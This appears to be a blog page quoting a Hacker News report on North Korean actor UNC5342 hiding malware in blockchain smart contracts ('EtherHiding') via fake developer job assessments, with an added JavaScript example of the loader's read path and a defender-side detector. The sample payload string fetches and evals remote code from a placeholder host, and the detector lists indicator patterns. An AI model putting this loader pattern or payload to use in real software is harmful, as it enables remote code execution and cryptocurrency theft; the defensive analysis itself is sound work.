
"A threat actor with ties to the Democratic People's Republic of Korea (aka North Korea) has been observed leveraging the EtherHiding technique to distribute malware and enable cryptocurrency theft, marking the first time a state-sponsored hacking group has embraced the method. The activity has been attributed by Google Threat Intelligence Group (GTIG) to a threat cluster it tracks as UNC5342, which is also known as CL-STA-0240 (Palo Alto Networks Unit 42), DeceptiveDevelopment (ESET), DEV#POPPER (Securonix), Famous Chollima (CrowdStrike),"
"Google said it has observed UNC5342 incorporating EtherHiding - a stealthy approach that involves embedding nefarious code within a smart contract on a public blockchain like BNB Smart Chain (BSC) or Ethereum - since February 2025. In doing so, the attack turns the blockchain into a decentralized dead drop resolver that's resilient to takedown efforts. Besides resilience, EtherHiding also abuses the pseudonymous nature of blockchain transactions to make it harder to trace who has deployed the smart contract."
UNC5342, a threat cluster linked to the Democratic People's Republic of Korea, uses social engineering on LinkedIn to lure developers and then moves the conversation to Telegram or Discord. The attackers pose as recruiters or hiring managers and trick targets into running malicious code under the pretext of a job assessment. The campaign aims to gain unauthorized access to developer machines, steal sensitive data, and siphon cryptocurrency assets. EtherHiding stores the malicious code in a smart contract on a public blockchain such as BNB Smart Chain or Ethereum, turning the chain into a decentralized dead drop that is resilient to takedown and, because the deployer is only a pseudonymous address, harder to attribute. Because the attackers control the contract, they can replace the stored payload at any time with a new transaction, which gives the operation flexibility and lets them vary what the loader delivers without touching the victim's machine again.
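The mechanics behind that dead drop are simple: the loader makes a read-only `eth_call` against the contract's getter and ABI-decodes the returned string, and the attacker swaps the payload with a setter transaction. The following is an added example written for this page, not code from the article, from GTIG, or from the UNC5342 loader itself. It shows both sides: how such a loader would build the JSON-RPC request and decode the answer, and how a defender can run the same decoding over an outbound request/response pair captured at a proxy to see what the contract actually handed back. The contract address, the four-byte selector, the RPC URL, and the sample payload are all constructed placeholders (the real selector would be the first four bytes of keccak256 of the getter's signature, which is not computed here).

```javascript
// Added example (not from the article or GTIG). Demonstrates the EtherHiding
// read path: a read-only eth_call to a contract getter that returns a string,
// plus ABI decoding of that string and a defender-side inspection of the
// request/response pair. All identifiers below are placeholders.

const RPC_URL = "https://rpc.example/";          // placeholder public RPC endpoint
const CONTRACT = "0x" + "11".repeat(20);         // placeholder contract address
const SELECTOR = "0xdeadbeef";                   // placeholder 4-byte function selector

// JSON-RPC body a loader sends to read the current payload. eth_call is served
// by the RPC node and is never written to the chain, so the read itself leaves
// no on-chain record; only the host's outbound HTTPS traffic shows it.
function buildEthCall(contract, selector) {
  return {
    jsonrpc: "2.0",
    id: 1,
    method: "eth_call",
    params: [{ to: contract, data: selector }, "latest"],
  };
}

// ABI encoding of a single `string` return value:
//   word 0: offset to the dynamic data (always 0x20 for one return value)
//   word 1: byte length of the string
//   word 2..: UTF-8 bytes, right-padded with zeros to a 32-byte boundary
function abiEncodeString(s) {
  const data = Buffer.from(s, "utf8");
  const padLen = (32 - (data.length % 32)) % 32;
  const offsetWord = Buffer.alloc(32);
  const lengthWord = Buffer.alloc(32);
  offsetWord.writeUInt32BE(0x20, 28);
  lengthWord.writeUInt32BE(data.length, 28);
  return "0x" + Buffer.concat([offsetWord, lengthWord, data, Buffer.alloc(padLen)]).toString("hex");
}

// Inverse of the above; throws if the buffer is not a well-formed ABI string.
function abiDecodeString(hex) {
  const buf = Buffer.from(hex.replace(/^0x/, ""), "hex");
  if (buf.length < 64) throw new Error("response too short for an ABI string");
  const offset = Number(buf.readBigUInt64BE(24));          // low 8 bytes of word 0
  const length = Number(buf.readBigUInt64BE(offset + 24)); // low 8 bytes of the length word
  const start = offset + 32;
  if (start + length > buf.length) throw new Error("declared length exceeds payload");
  return buf.subarray(start, start + length).toString("utf8");
}

// Defender side: given the raw JSON of an eth_call request and its response
// (for example from a TLS-terminating proxy log), decode what the contract
// returned and flag strings that look like a second-stage loader.
const INDICATORS = [/eval\s*\(/, /new\s+Function\s*\(/, /fetch\s*\(/, /https?:\/\//i];

function inspectEthCall(requestJson, responseJson) {
  const req = JSON.parse(requestJson);
  if (req.method !== "eth_call") return null;
  const { to, data } = req.params[0] || {};
  const selector = typeof data === "string" ? data.slice(0, 10) : null;
  let payload = null;
  try {
    payload = abiDecodeString(JSON.parse(responseJson).result);
  } catch (e) {
    payload = null; // not a string return (uint, bool, ...) or malformed; nothing to inspect
  }
  const suspicious = payload !== null && INDICATORS.some((re) => re.test(payload));
  return { contract: to, selector, payload, suspicious };
}

// Constructed sample traffic: the kind of string an EtherHiding contract would
// hand back to a loader, encoded exactly as an RPC node would return it.
const SAMPLE_PAYLOAD = 'const u="https://cdn.example/stage2.js";eval(await (await fetch(u)).text())';
const SAMPLE_REQUEST = JSON.stringify(buildEthCall(CONTRACT, SELECTOR));
const SAMPLE_RESPONSE = JSON.stringify({ jsonrpc: "2.0", id: 1, result: abiEncodeString(SAMPLE_PAYLOAD) });

function demo() {
  return inspectEthCall(SAMPLE_REQUEST, SAMPLE_RESPONSE);
}

console.log(`POST ${RPC_URL}`);
console.log(JSON.stringify(demo(), null, 2));
```

Two things to take from the example. First, the read-only call is the only observable on the victim side, so detection has to come from host or network telemetry (a developer workstation or CI runner POSTing `eth_call` bodies to a public RPC endpoint that the build has no reason to contact), not from the chain. Second, the attacker's update path is a normal transaction from their own address, which is exactly the pseudonymous-but-visible trail the article describes: the payload history of the contract can be reconstructed by anyone with a node, even though the deployer cannot easily be identified.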
Read at The Hacker News